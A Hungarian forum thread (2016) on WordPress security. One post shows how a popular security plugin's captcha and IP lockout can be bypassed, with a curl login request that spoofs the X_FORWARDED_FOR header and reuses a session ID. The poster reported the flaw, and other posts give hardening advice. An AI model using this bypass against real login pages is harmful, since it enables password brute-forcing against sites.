SOS segítség kellene wordpress oldalhoz

**Geri** · 2016-12-21, 01:43

Pityu eredeti hozzászólása

Ne már, évek óta ezt használom :S

A captchat mindosszesen egyszer validalja egy session alatt, ugyhogy azt annyi megkerulni egy bruteforce script-el, hogy egyszer beirom es onnantol a kapott session_id-t hasznalom.
Az IP cimet az X_FORWARDED_FOR http fejlect alapjan ellenorzi, es azt arra allitod amire akarod:

Kód:

curl -i -s -k  -X 'POST' \
    -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Referer: http://localhost:9000/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%3A9000%2Fwp-admin&reauth=1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' \
    -H "X_FORWARDED_FOR: 1.1.1.1" \
    -b 'wordpress_test_cookie=WP+Cookie+check; PHPSESSID=c0cotcgsm8ja7pg24i16vba4b6' \
    --data-binary $'log=foo&pwd=bar&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%3A9000%2Fwp-admin&testcookie=1' \
    'http://localhost:9000/wp-login.php'

**Pityu** · 2016-12-21, 08:36

Azért elég gáz így kiadni egy plugint...

**Geri** · 2016-12-21, 10:48

Pityu eredeti hozzászólása

Azért elég gáz így kiadni egy plugint...

Ilyen az amikor olyan ember probal biztonsagi plugint fejleszteni, akinek fogalma sincs a biztonsagrol. Es sajnos 30ezer letoltese is van

Jeleztem az embernek a hibat, gondolom javitja hamarosan.

**Pityu** · 2016-12-21, 11:41

Szerintem a 30.000 letöltő nevében mondom, hogy köszi a hibajelzést.
Azért valahol groteszk, hogy egy biztonsági plugin megbukik biztonságból...

**DomainFlotta** · 2016-12-21, 13:30

ilyenkor olyan késztetést érzek, hogy belerúgjak a wordpressbe és kampányoljak vele, de visszafogom magam.

**Pityu** · 2016-12-21, 13:32

Mondjuk ez konkrétan nem a wordpress hibája, de értem a felháborodásod.

DomainFlotta eredeti hozzászólása

ilyenkor olyan késztetést érzek, hogy belerúgjak a wordpressbe és kampányoljak vele, de visszafogom magam.

wpdanielakos · 2016-12-21, 18:02

1. XMLRPC-t tiltani (xmlrpc.php) - ezt hasznalja wp pingbackre, ha valami ez valoban serulekeny cucc, es rendesen ki is hasznaljak, pl tulterheleses pingback tamadas, stb.
2. Cache konfiguraciot ellenorizni, ha W3TC van, akkor cserelni erre: https://github.com/szepeviktor/w3-total-cache-fixed
3. Security modul: https://wordpress.org/plugins-wp/better-wp-security/

ha segitseg kell, irj nyugodtan: kovacsdanielakos kackac progweb pontocska hu

**Geri** · 2016-12-22, 10:23

Pityu eredeti hozzászólása

Szerintem a 30.000 letöltő nevében mondom, hogy köszi a hibajelzést.
Azért valahol groteszk, hogy egy biztonsági plugin megbukik biztonságból...

En ezt a plugint lecserelnem a helyedben. Beszeltem a sraccal, es fogalmatlan szegeny. Amikor valaki azt kerdezi, hogy hogyan tudja a session_id-t valaki megnezni, majd azt mondja, hogy cookie-t fog hasznalni a kovetkezo valtozatban, mert az biztonsagosabb, az elmondja hogy semmit se ert a biztonsaghoz.